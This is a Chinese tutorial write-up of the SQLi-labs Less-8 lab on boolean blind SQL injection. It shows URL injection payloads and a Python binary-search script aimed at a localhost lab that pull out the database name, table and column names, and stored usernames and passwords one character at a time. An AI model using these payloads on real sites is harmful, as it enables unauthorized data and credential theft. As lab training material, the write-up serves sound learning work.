SQL注入漏洞解析-less-8(布尔盲注)

我们来看一下第八关

当我们进行尝试时,他只有**You are in...........**或者没有显示。

他只有对和错显示,那我们只能用对或者错误来猜他这个数据库

?id=1%27%20and%20ascii(substr(database(),1,1))>114--+

?id=1%27%20and%20ascii(substr(database(),1,1))>115--+

我用ascii码https://picx.zhimg.com/70/v2-5ffbc3719a99246db040f0a068ad2ef5_1440w.avis?source=172ae18b&biz_tag=Posthttps://picx.zhimg.com/70/v2-5ffbc3719a99246db040f0a068ad2ef5_1440w.avis?source=172ae18b&biz_tag=Post来猜,用substr来截取他的第一个字段,如果我猜对了,他就正常显示,如果我猜错了,他就没有显示,就像上边的,当我猜到第114个时显示正常,当为115时没有显示,说明我就猜出来他的第一个字段的ASCII是115,然后在对照查询ASCII表就能找出来以此类推,就能猜出来,但是这样效率太低,所以写一个脚本来执行:

python 复制代码
import requests

def inject_database(url):
    name=""
    for i in range(1,20):
        low =32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url,params=params)
            if 'You are in...........' in r.text:
                 low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name += chr(mid)
        print(name)
if __name__=="__main__":
    url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8/index.php'
    inject_database(url)

最后注入出了数据库名称,后边的就是表和列的查询,和之前的都一样,只不过这里是要用ASCII码来猜而已,就是有点慢。

第二种就是手动测试:

行爆库()

?id=1' and (length(database())) = 8 --+

爆库(security)

?id=1' and (ascii(substr((select database()),1,1))) = 115--+

?id=1' and (ascii(substr((select database()),2,1))) = 101--+

?id=1' and (ascii(substr((select database()),3,1))) = 99--+

?id=1' and (ascii(substr((select database()),4,1))) = 117--+

?id=1' and (ascii(substr((select database()),5,1))) = 114--+

?id=1' and (ascii(substr((select database()),6,1))) = 105--+

?id=1' and (ascii(substr((select database()),7,1))) = 116--+

?id=1' and (ascii(substr((select database()),8,1))) = 121--+

首先判断表的长度

?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+ (此时字段长度为6就是6个字符)此时是第一个表

我们要判断第四个表的

?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+ //字段长度为5(users)
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))) = 117--+

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),2,1))) = 115--+

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),3,1))) = 101--+

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),4,1))) = 114--+

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),5,1))) = 115--+

爆字段

?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i

?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 2,1) ,1,1))) = 112 --+ 爆的p

爆数据

username

?id=1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+

?id=1' and (ascii(substr((select username from users limit 0,1),2,1))) = 117 --+

?id=1' and (ascii(substr((select username from users limit 0,1),3,1))) = 109 --+

?id=1' and (ascii(substr((select username from users limit 0,1),4,1))) = 112 --+

password

?id=1' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --+

?id=1' and (ascii(substr((select password from users limit 0,1),2,1))) = 117 --+

?id=1' and (ascii(substr((select password from users limit 0,1),3,1))) = 109 --+

?id=1' and (ascii(substr((select password from users limit 0,1),4,1))) = 112 --+

就这样一个一个爆,出来之后在对照ASCII码表就能查出数据

相关推荐
努力学习的小廉8 分钟前
深入了解linux系统—— 线程同步
linux·服务器·数据库·算法
格调UI成品32 分钟前
DCS+PLC协同优化:基于MQTT的分布式控制系统能效提升案例
数据库·云边协同
鸿乃江边鸟1 小时前
Flink中的 BinaryRowData 以及大小端
大数据·sql·flink
牵牛老人1 小时前
Qt C++ 复杂界面处理:巧用覆盖层突破复杂界面处理难题之一
数据库·c++·qt
a_blue_ice1 小时前
JAVA 面试 MySQL
java·mysql·面试
GBASE1 小时前
GBASE南大通用技术分享:构建最优数据平台,GBase 8s数据库安装准备(三)
数据库
言之。2 小时前
Django REST Framework 中 @action 装饰器详解
数据库·sqlite
十八旬3 小时前
苍穹外卖项目实战(day7-1)-缓存菜品和缓存套餐功能-记录实战教程、问题的解决方法以及完整代码
java·数据库·spring boot·redis·缓存·spring cache
Java水解5 小时前
【MySQL】数据库基础
后端·mysql
沃夫上校5 小时前
MySQL 中文拼音排序问题
java·mysql